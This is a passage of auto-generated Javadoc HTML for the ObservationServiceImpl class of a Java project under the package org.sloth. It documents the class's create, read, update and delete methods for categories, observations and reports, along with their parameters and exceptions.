<PRE> java.lang.Object <IMG SRC="../../../../resources/inherit.gif" ALT="extended by "><B>org.sloth.service.impl.ObservationServiceImpl</B> </PRE> <DL> <DT><B>All Implemented Interfaces:</B> <DD><A HREF="../../../../org/sloth/service/ObservationService.html" title="interface in org.sloth.service">ObservationService</A></DD> </DL> <HR> <DL> <DT><PRE><FONT SIZE="-1">@Service </FONT>public class <B>ObservationServiceImpl</B><DT>extends java.lang.Object<DT>implements <A HREF="../../../../org/sloth/service/ObservationService.html" title="interface in org.sloth.service">ObservationService</A></DL> </PRE> <P> Implemtation of <A HREF="../../../../org/sloth/service/ObservationService.html" title="interface in org.sloth.service"><CODE>ObservationService</CODE></A>. <P> <P> <DL> <DT><B>Author:</B></DT> <DD>Christian Autermann, Stefan Arndt, Dustin Demuth, Christoph Fendrich, Simon Ottenhues, Christian Paluschek</DD> </DL> <HR> <P> <!-- ======== CONSTRUCTOR SUMMARY ======== --> <A NAME="constructor_summary"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> <B>Constructor Summary</B></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><CODE><B><A HREF="../../../../org/sloth/service/impl/ObservationServiceImpl.html#ObservationServiceImpl()">ObservationServiceImpl</A></B>()</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> </TABLE> &nbsp; <!-- ========== METHOD SUMMARY =========== --> <A NAME="method_summary"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> <B>Method Summary</B></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/sloth/service/impl/ObservationServiceImpl.html#deleteCategorie(org.sloth.model.Categorie)">deleteCategorie</A></B>(<A HREF="../../../../org/sloth/model/Categorie.html" title="class in org.sloth.model">Categorie</A>&nbsp;categorie)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Deletes a <code>Categorie</code>.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/sloth/service/impl/ObservationServiceImpl.html#deleteCategorie(java.lang.Long)">deleteCategorie</A></B>(java.lang.Long&nbsp;id)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Deletes a <code>Categorie</code>.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/sloth/service/impl/ObservationServiceImpl.html#deleteObservation(java.lang.Long)">deleteObservation</A></B>(java.lang.Long&nbsp;id)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Deletes an <code>Observation</code>.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/sloth/service/impl/ObservationServiceImpl.html#deleteObservation(org.sloth.model.Observation)">deleteObservation</A></B>(<A HREF="../../../../org/sloth/model/Observation.html" title="class in org.sloth.model">Observation</A>&nbsp;observation)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Deletes an <code>Observation</code>.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/sloth/service/impl/ObservationServiceImpl.html#deleteReport(org.sloth.model.Report)">deleteReport</A></B>(<A HREF="../../../../org/sloth/model/Report.html" title="class in org.sloth.model">Report</A>&nbsp;r)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Unregisters a <code>Report</code>.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;<A HREF="../../../../org/sloth/model/Categorie.html" title="class in org.sloth.model">Categorie</A></CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/sloth/service/impl/ObservationServiceImpl.html#getCategorie(java.lang.Long)">getCategorie</A></B>(java.lang.Long&nbsp;id)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Returns the <code>Categorie</code> with the specified <code>id</code>.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;<A HREF="../../../../org/sloth/model/Categorie.html" title="class in org.sloth.model">Categorie</A></CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/sloth/service/impl/ObservationServiceImpl.html#getCategorieByTitle(java.lang.String)">getCategorieByTitle</A></B>(java.lang.String&nbsp;title)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Returns the <code>Categorie</code>s with the <code>title</code>.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;java.util.Collection&lt;<A HREF="../../../../org/sloth/model/Categorie.html" title="class in org.sloth.model">Categorie</A>&gt;</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/sloth/service/impl/ObservationServiceImpl.html#getCategories()">getCategories</A></B>()</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Returns all <code>Categorie</code>s known by the system.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;java.util.List&lt;<A HREF="../../../../org/sloth/model/Observation.html" title="class in org.sloth.model">Observation</A>&gt;</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/sloth/service/impl/ObservationServiceImpl.html#getNewestObservations(int)">getNewestObservations</A></B>(int&nbsp;u)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Returns the last created <code>Observation</code>s.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;<A HREF="../../../../org/sloth/model/Observation.html" title="class in org.sloth.model">Observation</A></CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/sloth/service/impl/ObservationServiceImpl.html#getObservation(java.lang.Long)">getObservation</A></B>(java.lang.Long&nbsp;id)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Returns the <code>Observation</code> with the specified <code>id</code>.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;java.util.Collection&lt;<A HREF="../../../../org/sloth/model/Observation.html" title="class in org.sloth.model">Observation</A>&gt;</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/sloth/service/impl/ObservationServiceImpl.html#getObservations()">getObservations</A></B>()</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Returns all <code>Observation</code>s known by the system.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;java.util.Collection&lt;<A HREF="../../../../org/sloth/model/Observation.html" title="class in org.sloth.model">Observation</A>&gt;</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/sloth/service/impl/ObservationServiceImpl.html#getObservations(org.sloth.model.Categorie)">getObservations</A></B>(<A HREF="../../../../org/sloth/model/Categorie.html" title="class in org.sloth.model">Categorie</A>&nbsp;oc)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Returns all <code>Observation</code>s in the specified <code>Categorie</code>.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;java.util.Collection&lt;<A HREF="../../../../org/sloth/model/Observation.html" title="class in org.sloth.model">Observation</A>&gt;</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/sloth/service/impl/ObservationServiceImpl.html#getObservations(java.lang.String)">getObservations</A></B>(java.lang.String&nbsp;keyword)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Searches all <code>Observaton</code> titles, descriptions and all <code>Categorie</code> titles and descriptions for the specified keyword.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;java.util.Collection&lt;<A HREF="../../../../org/sloth/model/Observation.html" title="class in org.sloth.model">Observation</A>&gt;</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/sloth/service/impl/ObservationServiceImpl.html#getObservationsByUser(org.sloth.model.User)">getObservationsByUser</A></B>(<A HREF="../../../../org/sloth/model/User.html" title="class in org.sloth.model">User</A>&nbsp;u)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Returns all <code>Observation</code>s created by the the specified <code>User</code>.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;<A HREF="../../../../org/sloth/model/Report.html" title="class in org.sloth.model">Report</A></CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/sloth/service/impl/ObservationServiceImpl.html#getReport(java.lang.Long)">getReport</A></B>(java.lang.Long&nbsp;id)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Searches for a <code>Report</code> with the specified <code>id</code>.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;java.util.Collection&lt;<A HREF="../../../../org/sloth/model/Report.html" title="class in org.sloth.model">Report</A>&gt;</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/sloth/service/impl/ObservationServiceImpl.html#getReports()">getReports</A></B>()</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Returns all known <code>Report</code>s.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;java.util.Collection&lt;<A HREF="../../../../org/sloth/model/Report.html" title="class in org.sloth.model">Report</A>&gt;</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/sloth/service/impl/ObservationServiceImpl.html#getReportsByObservation(org.sloth.model.Observation)">getReportsByObservation</A></B>(<A HREF="../../../../org/sloth/model/Observation.html" title="class in org.sloth.model">Observation</A>&nbsp;o)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Returns all <code>Report</code>s made for a specified <code>Observation</code>.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;java.util.Collection&lt;<A HREF="../../../../org/sloth/model/Report.html" title="class in org.sloth.model">Report</A>&gt;</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/sloth/service/impl/ObservationServiceImpl.html#getReportsByProcessedState(boolean)">getReportsByProcessedState</A></B>(boolean&nbsp;processed)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Returns all <code>Report</code>s with the specified processed-state.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;java.util.Collection&lt;<A HREF="../../../../org/sloth/model/Report.html" title="class in org.sloth.model">Report</A>&gt;</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/sloth/service/impl/ObservationServiceImpl.html#getReportsByUser(org.sloth.model.User)">getReportsByUser</A></B>(<A HREF="../../../../org/sloth/model/User.html" title="class in org.sloth.model">User</A>&nbsp;u)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Returns all <code>Report</code>s created by a <code>User</code>.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;boolean</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/sloth/service/impl/ObservationServiceImpl.html#isCategorieTitleAvailable(java.lang.String)">isCategorieTitleAvailable</A></B>(java.lang.String&nbsp;title)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Returns wether the <code>title</code> is available.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/sloth/service/impl/ObservationServiceImpl.html#registrate(org.sloth.model.Categorie)">registrate</A></B>(<A HREF="../../../../org/sloth/model/Categorie.html" title="class in org.sloth.model">Categorie</A>&nbsp;categorie)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Adds a <code>Categorie</code> to the system.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/sloth/service/impl/ObservationServiceImpl.html#registrate(org.sloth.model.Observation)">registrate</A></B>(<A HREF="../../../../org/sloth/model/Observation.html" title="class in org.sloth.model">Observation</A>&nbsp;observation)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Adds an <code>Observation</code> to the system.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/sloth/service/impl/ObservationServiceImpl.html#registrate(org.sloth.model.Report)">registrate</A></B>(<A HREF="../../../../org/sloth/model/Report.html" title="class in org.sloth.model">Report</A>&nbsp;r)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Registrates a <code>Report</code>.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/sloth/service/impl/ObservationServiceImpl.html#setCategorieDao(org.sloth.persistence.CategorieDao)">setCategorieDao</A></B>(<A HREF="../../../../org/sloth/persistence/CategorieDao.html" title="interface in org.sloth.persistence">CategorieDao</A>&nbsp;ocDao)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/sloth/service/impl/ObservationServiceImpl.html#setObservationDao(org.sloth.persistence.ObservationDao)">setObservationDao</A></B>(<A HREF="../../../../org/sloth/persistence/ObservationDao.html" title="interface in org.sloth.persistence">ObservationDao</A>&nbsp;oDao)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/sloth/service/impl/ObservationServiceImpl.html#setReportDao(org.sloth.persistence.ReportDao)">setReportDao</A></B>(<A HREF="../../../../org/sloth/persistence/ReportDao.html" title="interface in org.sloth.persistence">ReportDao</A>&nbsp;rDao)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/sloth/service/impl/ObservationServiceImpl.html#updateCategorie(org.sloth.model.Categorie)">updateCategorie</A></B>(<A HREF="../../../../org/sloth/model/Categorie.html" title="class in org.sloth.model">Categorie</A>&nbsp;categorie)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Merges changes made to <code>categorie</code> into the system.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/sloth/service/impl/ObservationServiceImpl.html#updateObservation(org.sloth.model.Observation)">updateObservation</A></B>(<A HREF="../../../../org/sloth/model/Observation.html" title="class in org.sloth.model">Observation</A>&nbsp;observation)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Merges changes made to <code>observation</code> into the system.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../org/sloth/service/impl/ObservationServiceImpl.html#updateReport(org.sloth.model.Report)">updateReport</A></B>(<A HREF="../../../../org/sloth/model/Report.html" title="class in org.sloth.model">Report</A>&nbsp;r)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Persist changes made to an specified <code>Report</code>.</TD> </TR> </TABLE> &nbsp;<A NAME="methods_inherited_from_class_java.lang.Object"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#EEEEFF" CLASS="TableSubHeadingColor"> <TH ALIGN="left"><B>Methods inherited from class java.lang.Object</B></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><CODE>clone, equals, finalize, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait</CODE></TD> </TR> </TABLE> &nbsp; <P> <!-- ========= CONSTRUCTOR DETAIL ======== --> <A NAME="constructor_detail"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="1"><FONT SIZE="+2"> <B>Constructor Detail</B></FONT></TH> </TR> </TABLE> <A NAME="ObservationServiceImpl()"><!-- --></A><H3> ObservationServiceImpl</H3> <PRE> public <B>ObservationServiceImpl</B>()</PRE> <DL> </DL> <!-- ============ METHOD DETAIL ========== --> <A NAME="method_detail"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="1"><FONT SIZE="+2"> <B>Method Detail</B></FONT></TH> </TR> </TABLE> <A NAME="deleteCategorie(org.sloth.model.Categorie)"><!-- --></A><H3> deleteCategorie</H3> <PRE> public void <B>deleteCategorie</B>(<A HREF="../../../../org/sloth/model/Categorie.html" title="class in org.sloth.model">Categorie</A>&nbsp;categorie) throws java.lang.NullPointerException, java.lang.IllegalArgumentException</PRE> <DL> <DD><B>Description copied from interface: <CODE><A HREF="../../../../org/sloth/service/ObservationService.html#deleteCategorie(org.sloth.model.Categorie)">ObservationService</A></CODE></B></DD> <DD>Deletes a <code>Categorie</code>. <P> <DD><DL> <DT><B>Specified by:</B><DD><CODE><A HREF="../../../../org/sloth/service/ObservationService.html#deleteCategorie(org.sloth.model.Categorie)">deleteCategorie</A></CODE> in interface <CODE><A HREF="../../../../org/sloth/service/ObservationService.html" title="interface in org.sloth.service">ObservationService</A></CODE></DL> </DD> <DD><DL> <DT><B>Parameters:</B><DD><CODE>categorie</CODE> - the <code>Categorie</code> <DT><B>Throws:</B> <DD><CODE>java.lang.NullPointerException</CODE> - if <code>categorie</code> is <code>null</code> <DD><CODE>java.lang.IllegalArgumentException</CODE> - if <code>categorie</code> is not know by the system or <code>categorie</code> is the default <code>Categorie</code></DL> </DD> </DL> <HR> <A NAME="deleteCategorie(java.lang.Long)"><!-- --></A><H3> deleteCategorie</H3> <PRE> public void <B>deleteCategorie</B>(java.lang.Long&nbsp;id) throws java.lang.NullPointerException, java.lang.IllegalArgumentException</PRE> <DL> <DD><B>Description copied from interface: <CODE><A HREF="../../../../org/sloth/service/ObservationService.html#deleteCategorie(java.lang.Long)">ObservationService</A></CODE></B></DD> <DD>Deletes a <code>Categorie</code>. <P> <DD><DL> <DT><B>Specified by:</B><DD><CODE><A HREF="../../../../org/sloth/service/ObservationService.html#deleteCategorie(java.lang.Long)">deleteCategorie</A></CODE> in interface <CODE><A HREF="../../../../org/sloth/service/ObservationService.html" title="interface in org.sloth.service">ObservationService</A></CODE></DL> </DD> <DD><DL> <DT><B>Parameters:</B><DD><CODE>id</CODE> - the id <DT><B>Throws:</B> <DD><CODE>java.lang.NullPointerException</CODE> - if <code>id</code> is <code>null</code> <DD><CODE>java.lang.IllegalArgumentException</CODE> - if no <code>Categorie</code> with <code>id</code> as Id is known by the system or the matching <code>categorie</code> is the default <code>Categorie</code></DL> </DD> </DL> <HR> <A NAME="deleteObservation(java.lang.Long)"><!-- --></A><H3> deleteObservation</H3> <PRE> public void <B>deleteObservation</B>(java.lang.Long&nbsp;id) throws java.lang.NullPointerException, java.lang.IllegalArgumentException</PRE> <DL> <DD><B>Description copied from interface: <CODE><A HREF="../../../../org/sloth/service/ObservationService.html#deleteObservation(java.lang.Long)">ObservationService</A></CODE></B></DD> <DD>Deletes an <code>Observation</code>. <P> <DD><DL> <DT><B>Specified by:</B><DD><CODE><A HREF="../../../../org/sloth/service/ObservationService.html#deleteObservation(java.lang.Long)">deleteObservation</A></CODE> in interface <CODE><A HREF="../../../../org/sloth/service/ObservationService.html" title="interface in org.sloth.service">ObservationService</A></CODE></DL> </DD> <DD><DL> <DT><B>Parameters:</B><DD><CODE>id</CODE> - the id <DT><B>Throws:</B> <DD><CODE>java.lang.NullPointerException</CODE> - if <code>id</code> is <code>null</code> <DD><CODE>java.lang.IllegalArgumentException</CODE> - if no <code>Observation</code> with <code>id</code> as Id is known by the system</DL> </DD> </DL> <HR> <A NAME="deleteObservation(org.sloth.model.Observation)"><!-- --></A><H3> deleteObservation</H3> <PRE> public void <B>deleteObservation</B>(<A HREF="../../../../org/sloth/model/Observation.html" title="class in org.sloth.model">Observation</A>&nbsp;observation) throws java.lang.NullPointerException, java.lang.IllegalArgumentException</PRE> <DL> <DD><B>Description copied from interface: <CODE><A HREF="../../../../org/sloth/service/ObservationService.html#deleteObservation(org.sloth.model.Observation)">ObservationService</A></CODE></B></DD> <DD>Deletes an <code>Observation</code>. <P> <DD><DL> <DT><B>Specified by:</B><DD><CODE><A HREF="../../../../org/sloth/service/ObservationService.html#deleteObservation(org.sloth.model.Observation)">deleteObservation</A></CODE> in interface <CODE><A HREF="../../../../org/sloth/service/ObservationService.html" title="interface in org.sloth.service">ObservationService</A></CODE></DL> </DD> <DD><DL> <DT><B>Parameters:</B><DD><CODE>observation</CODE> - the <code>Observation</code> <DT><B>Throws:</B> <DD><CODE>java.lang.NullPointerException</CODE> - if <code>observation</code> is <code>null</code> <DD><CODE>java.lang.IllegalArgumentException</CODE> - if <code>observation</code> is not know by the system</DL> </DD> </DL> <HR> <A NAME="deleteReport(org.sloth.model.Report)"><!-- --></A><H3> deleteReport</H3> <PRE> public void <B>deleteReport</B>(<A HREF="../../../../org/sloth/model/Report.html" title="class in org.sloth.model">Report</A>&nbsp;r) throws java.lang.NullPointerException, java.lang.IllegalArgumentException</PRE> <DL> <DD><B>Description copied from interface: <CODE><A HREF="../../../../org/sloth/service/ObservationService.html#deleteReport(org.sloth.model.Report)">ObservationService</A></CODE></B></DD> <DD>Unregisters a <code>Report</code>. <P> <DD><DL> <DT><B>Specified by:</B><DD><CODE><A HREF="../../../../org/sloth/service/ObservationService.html#deleteReport(org.sloth.model.Report)">deleteReport</A></CODE> in interface <CODE><A HREF="../../../../org/sloth/service/ObservationService.html" title="interface in org.sloth.service">ObservationService</A></CODE></DL> </DD> <DD><DL> <DT><B>Parameters:</B><DD><CODE>r</CODE> - the <code>Report</code> to delete <DT><B>Throws:</B> <DD><CODE>java.lang.NullPointerException</CODE> - if <code>r</code> is <code>null</code> <DD><CODE>java.lang.IllegalArgumentException</CODE> - if <code>r</code> is not known</DL> </DD> </DL> <HR> <A NAME="getCategorie(java.lang.Long)"><!-- --></A><H3> getCategorie</H3> <PRE> public <A HREF="../../../../org/sloth/model/Categorie.html" title="class in org.sloth.model">Categorie</A> <B>getCategorie</B>(java.lang.Long&nbsp;id) throws java.lang.NullPointerException</PRE> <DL> <DD><B>Description copied from interface: <CODE><A HREF="../../../../org/sloth/service/ObservationService.html#getCategorie(java.lang.Long)">ObservationService</A></CODE></B></DD> <DD>Returns the <code>Categorie</code> with the specified <code>id</code>. If the system does not an <code>Categorie</code> with that id, <code>null</code> is returned. <P> <DD><DL> <DT><B>Specified by:</B><DD><CODE><A HREF="../../../../org/sloth/service/ObservationService.html#getCategorie(java.lang.Long)">getCategorie</A></CODE> in interface <CODE><A HREF="../../../../org/sloth/service/ObservationService.html" title="interface in org.sloth.service">ObservationService</A></CODE></DL> </DD> <DD><DL> <DT><B>Parameters:</B><DD><CODE>id</CODE> - the <code>id</code> of the <code>Categorie</code> <DT><B>Returns:</B><DD>the <code>Categorie</code> or <code>null</code> <DT><B>Throws:</B> <DD><CODE>java.lang.NullPointerException</CODE> - if <code>id</code> is <code>null</code></DL> </DD> </DL> <HR> <A NAME="getCategorieByTitle(java.lang.String)"><!-- --></A><H3> getCategorieByTitle</H3> <PRE> public <A HREF="../../../../org/sloth/model/Categorie.html" title="class in org.sloth.model">Categorie</A> <B>getCategorieByTitle</B>(java.lang.String&nbsp;title)</PRE> <DL> <DD><B>Description copied from interface: <CODE><A HREF="../../../../org/sloth/service/ObservationService.html#getCategorieByTitle(java.lang.String)">ObservationService</A></CODE></B></DD> <DD>Returns the <code>Categorie</code>s with the <code>title</code>. <P> <DD><DL> <DT><B>Specified by:</B><DD><CODE><A HREF="../../../../org/sloth/service/ObservationService.html#getCategorieByTitle(java.lang.String)">getCategorieByTitle</A></CODE> in interface <CODE><A HREF="../../../../org/sloth/service/ObservationService.html" title="interface in org.sloth.service">ObservationService</A></CODE></DL> </DD> <DD><DL> <DT><B>Parameters:</B><DD><CODE>title</CODE> - the title <DT><B>Returns:</B><DD>the matching <code>Categorie</code> or <code>null</code> if none is present</DL> </DD> </DL> <HR> <A NAME="getCategories()"><!-- --></A><H3> getCategories</H3> <PRE> public java.util.Collection&lt;<A HREF="../../../../org/sloth/model/Categorie.html" title="class in org.sloth.model">Categorie</A>&gt; <B>getCategories</B>()</PRE> <DL> <DD><B>Description copied from interface: <CODE><A 